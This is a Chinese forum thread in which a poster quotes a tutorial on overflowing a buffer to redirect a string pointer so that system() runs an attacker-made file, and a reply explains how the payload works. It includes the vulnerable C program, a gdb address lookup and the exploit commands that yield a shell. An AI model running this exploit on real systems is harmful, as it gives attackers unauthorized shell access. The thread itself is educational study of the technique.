免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2456 | 回复: 3

[C] 缓冲区溢出的例子(字符串指针) [复制链接]

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-24 09:22 |显示全部楼层
本帖最后由 keymirage 于 2016-06-24 09:30 编辑

下面是一个关于利用字符串指针实现缓冲区溢出的例子。根据文中的解释及代码,我的理解是:
1)input[256]是在 stack 内分配
2)conf, license 是在 heap 当中分配
3)新建一个名字为 THIS 的文件,内容是 /bin/sh
4)通过gdb找到 license 的首址 addr_license
5)将 conf “改为” 指向 addr_license
6)执行后获取 shell

问题:
上面的5)是如何实现的?代码(Figure 10: strptr.c)只是对input[256]使用了strcpy,且license的字符串只有20个字符,input[]应该没有溢出。也就是conf的压栈位置(input+256)处的内容是没有被更改的(即没有被 addr_license 覆盖)........

下面贴出例子全文:

Hardcoded strings are not pushed upon the stack, but saved within non-randomized areas. Therefore it is relatively easy to redirect a string pointer to another string. The idea of redirecting string pointers is not to manipulate the output, but rather to manipulate the arguments of critical functions like system or execv.
  1. Figure 10: strptr.c
  2. i n t    main ( i n t a r g c , char ∗ a r g s [ ] )
  3. {
  4.     char i n p u t [ 2 5 6 ] ;
  5.     char ∗ c o n f = ” t e s t −f  ̃ / . p r o g r c ” ;
  6.     char ∗ l i c e n s e = ” THIS SOFTWARE I S . . . ” ;
  7.     printf ( license );

  8.     strcpy ( input , args [ 1 ] ) ;
  9.     i f ( system ( conf ) )
  10.         p r i n t f ( ” Missing . progrc ” ) ;
  11. }
复制代码
Consider the vulnerable program strptr in figure 10. This program contains two hardcoded strings: conf and license. The license is just designed for output; conf is designed to be executed as shell command. Assume an attacker can conf let point to the license string. What would be executed in the if statement is:

system("THIS SOFTWARE IS...\n";

system tries to execute THIS and treats the remaining string as parameters for THIS. An executable file called THIS cannot be found on a normal Unix system, but can and should be created by an attacker.

An attacker can write an arbitrary binary or script called THIS that will be executed with the privileges of strptr. It could contain /bin/sh for instance. Note, that this exploitation technique cannot be used remotely, since an executable file has to be created locally and note that this executable file has to be accessible by the PATH environment. The string pointer conf can be overwritten since the program contains a strcpy vulnerability. One can use gdb to readout the address of the license string:

(gdb) print license
0x8048562 "THIS SOFTWARE IS...\n"

So the conf pointer should be redirected to 08048562hex . An exploit works as follows:

> echo "/bin/sh" > THIS
> chmod 777 THIS
> PATH=.PATH
> ./strptr ‘perl -e ’print "A"x256; print "\x62\x85\x04\x08"’‘
THIS SOFTWARE IS...
sh-3.1$

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-24 09:33 |显示全部楼层
...............................................

论坛徽章:
0
发表于 2016-06-27 08:22 |显示全部楼层
perl -e ’print "A"x256; print "\x62\x85\x04\x08"

两个print哦, 第一个256个A覆盖input, 后面的4个字节(license的地址)覆盖conf, system(conf)就来执行THIS了,
这是理论上的, 但是实践通常很难成功哦, 除非关闭那些保护方法

奉劝楼主别研究这个了, 没前途, 时代变了, 老的c程序都很坚挺了, 再加上各种保护机制, 新程序大多都是更高级语言写的了.
看那些最近几年java的框架那些漏洞, 写个小脚本就能放倒一大群机器.

另外贴代码别用全角字符哦

论坛徽章:
3
程序设计版块每日发帖之星
日期:2016-02-13 06:20:00程序设计版块每日发帖之星
日期:2016-06-22 06:20:00程序设计版块每日发帖之星
日期:2016-06-28 06:20:00
发表于 2016-06-27 12:55 |显示全部楼层
tmp 发表于 2016-06-27 08:22
perl -e ’print "A"x256; print "\x62\x85\x04\x08"

两个print哦, 第一个256个A覆盖input, 后面的4个字 ...


谢谢提醒
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

SACC2019中国系统架构师大会

【数字转型 架构演进】SACC2019中国系统架构师大会
2019年10月31日~11月2日第11届中国系统架构师大会(SACC2019)将在北京隆重召开。四大主线并行的演讲模式,1个主会场、20个技术专场、超千人参与的会议规模,100+来自互联网、金融、制造业、电商等领域的嘉宾阵容,将为广大参会者提供一场最具价值的技术交流盛会。




----------------------------------------

大会官网>>
  

北京盛拓优讯信息技术有限公司. 版权所有 16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122
中国互联网协会会员  联系我们:huangweiwei@it168.com
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP